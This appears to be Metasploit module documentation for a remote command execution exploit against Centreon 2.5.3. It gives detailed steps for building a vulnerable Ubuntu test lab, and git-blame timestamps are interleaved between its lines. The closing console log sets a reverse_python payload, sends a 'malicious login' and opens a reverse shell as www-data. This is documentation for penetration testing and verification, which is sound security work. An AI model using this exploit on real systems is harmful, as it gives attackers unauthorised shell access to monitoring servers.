2016-06-12 00:57:18 +00:00
## Vulnerable Application
2016-06-23 00:32:51 +00:00
1. [Exploit-db ](https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz )
2. Archived Copy: [github ](https://github.com/h00die/MSF-Testing-Scripts )
2016-06-12 00:57:18 +00:00
### Creating A Testing Environment
Creating a testing environment for this application contained many steps, so I figured I would document the process here.
2016-07-20 16:48:28 +00:00
1. Create a fresh install of Ubuntu 16.04. I used a LAMP install. My user was `centreon`
2016-06-12 00:57:18 +00:00
2. Install php5.6 [askubuntu ](http://askubuntu.com/questions/756181/installing-php-5-6-on-xenial-16-04 )
2016-07-20 16:48:28 +00:00
```
sudo apt purge `dpkg -l | grep php| awk '{print $2}' |tr "\n" " "`
sudo add-apt-repository ppa:ondrej/php
sudo apt-get install php5.6
sudo apt-get install php5.6-mbstring php5.6-mcrypt php5.6-mysql php5.6-xml php5.6-gd php5.6-ldap php5.6-sqlite3
2016-07-20 18:16:57 +00:00
sudo apt-get install build-essential cmake librrd-dev libqt4-dev libqt4-sql-mysql libgnutls28-dev python-minimal
2016-07-20 16:48:28 +00:00
sudo apt-get install tofrodos bsd-mailx lsb-release mysql-server libmysqlclient-dev apache2 php-pear rrdtool librrds-perl libconfig-inifiles-perl libcrypt-des-perl libdigest-hmac-perl libgd-gd2-perl snmp snmpd libnet-snmp-perl libsnmp-perl
select OK
select No Configuration
sudo apt-get install snmp-mibs-downloader
```
3. Enable php5.6 in Apache with `a2enmod` , disable php7.0 with `a2dismod`
```
a2enmod php5.6
a2dismod php7.0
```
4. Restart apache with `sudo apache2ctl restart`
2016-06-12 00:57:18 +00:00
5. Install [Nagios Plugins ](https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/3/en/quickstart-ubuntu.html ) starting at step 6. The plugins link is broken, utilize [nagios-plugins-2.1.1.tar.gz ](http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz ) instead
2016-07-20 16:48:28 +00:00
```
wget http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz
tar xvf nagios-plugins-2.1.1.tar.gz
cd nagios-plugins-2.1.1/
./configure
make
sudo make install
2016-07-26 21:59:18 +00:00
```
5.1 If during make, you get an sslv3 method not found error (https://support.nagios.com/forum/viewtopic.php?f=35& t=36601& p=168235& hilit=SSLv3#p168235)
```
--- plugins/sslutils.c.orig 2016-01-14 20:02:06.419867000 +0100
+++ plugins/sslutils.c 2016-01-14 20:01:36.091492000 +0100
@@ -70,8 +70,13 @@
#endif
break;
case 3: /* SSLv3 protocol */
+#if defined(OPENSSL_NO_SSL3)
+ printf(("%s\n", _("CRITICAL - SSL protocol version 3 is not supported by your SSL library.")));
+ return STATE_CRITICAL;
+#else
method = SSLv3_client_method();
ssl_options = SSL_OP_NO_SSLv2 | SSL_OP_NO_TLSv1;
+#endif
break;
default: /* Unsupported */
printf("%s\n", _("CRITICAL - Unsupported SSL protocol version."));
2016-07-20 16:48:28 +00:00
```
6. Install [Centreon clib ](https://documentation.centreon.com/docs/centreon-clib/en/latest/installation/index.html )
```
cd ~
git clone https://github.com/centreon/centreon-clib
cd centreon-clib/build
cmake .
make
sudo make install
```
7. Install [Centreon Broker ](https://documentation.centreon.com/docs/centreon-broker/en/2.11/installation/index.html )
```
cd ~
git clone https://github.com/centreon/centreon-broker
cd centreon-broker/build/
cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
make
sudo make install
```
8. Install [Centreon Engine ](https://documentation.centreon.com/docs/centreon-engine/en/latest/installation/index.html )
```
cd ~
git clone https://github.com/centreon/centreon-engine
cd centreon-engine/build/
cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
make
sudo make install
```
9. Now install [Centreon Web ](https://documentation.centreon.com/docs/centreon/en/2.5.x/installation/from_sources.html ) but only the command line portion.
```
sudo mkdir /var/log/centreon-engine
cd ~
sudo pear install XML_RPC-1.4.5
2016-07-26 21:59:18 +00:00
(may need to install php-xml)
2016-07-20 16:48:28 +00:00
wget https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
tar vxf bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
cd centreon-2.5.3
sudo ./install.sh -i
< enter >
q
y
y
y
y
y
< enter >
y
< enter >
y
< enter >
y
< enter >
y
< enter >
y
< enter >
< enter >
< enter >
centreon
< enter >
/var/log/centreon-engine
/home/centreon/nagios-plugins-2.1.1/plugins
< enter >
/etc/init.d/centengine
/usr/local/bin/centengine
/usr/local/etc/
/usr/local/etc/
/etc/init.d/centengine
< enter >
y
y
y
< enter >
y
< enter >
< enter >
y
y
< enter >
y
y
< enter >
y
< enter >
< enter >
y
y
```
10. Fix apache config
```
sudo cp /etc/apache2/conf.d/centreon.conf /etc/apache2/conf-available/
sudo sed -i 's/Order allow,deny/Require all granted/' /etc/apache2/conf-available/centreon.conf
sudo sed -i 's/allow from all//' /etc/apache2/conf-available/centreon.conf
sudo a2enconf centreon
sudo service apache2 reload
```
11. Configure via website. Browse to < ip > /centreon
```
next
next
select centreon-engine
/usr/local/lib/centreon-engine
/usr/local/bin/centenginestats
/usr/local/lib/centreon-engine
/usr/local/lib/centreon-engine
/usr/local/lib/centreon-engine
next
select centreon-broker
/usr/local/lib/centreon-broker
/usr/local/lib/cbmod.so
/usr/local/lib/centreon-broker
/usr/local/lib/centreon-broker
/usr/local/lib/centreon-broker
next
Pick whatever details about your user you want, next
Fill in mysql Root password, next
next
next
finish
```
2016-06-12 00:57:18 +00:00
## Verification Steps
1. Install the application
2. Start msfconsole
2016-06-23 00:32:51 +00:00
3. Do: `use exploit/linux/http/centreon_useralias_exec`
4. Do: `set payload`
5. Do: `set rhost`
6. Do: `check`
2016-06-12 00:57:18 +00:00
7. Do: ```run```
8. You should get a shell.
## Scenarios
2016-06-23 00:32:51 +00:00
Just a standard run.
2017-08-27 00:12:48 +00:00
```
2016-06-23 00:32:51 +00:00
msf > use exploit/linux/http/centreon_useralias_exec
msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
lhost => 192.168.2.229
msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
rhost => 192.168.2.85
msf exploit(centreon_useralias_exec) > set verbose true
verbose => true
msf exploit(centreon_useralias_exec) > check
[+] Version Detected: 2.5.3
[*] 192.168.2.85:80 The target appears to be vulnerable.
msf exploit(centreon_useralias_exec) > exploit
[*] Started reverse TCP handler on 192.168.2.229:4444
[*] Sending malicious login
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
whoami
www-data
uname -a
Linux centreon 4.4.0-21-generic #37 -Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
2016-07-26 21:59:18 +00:00
```
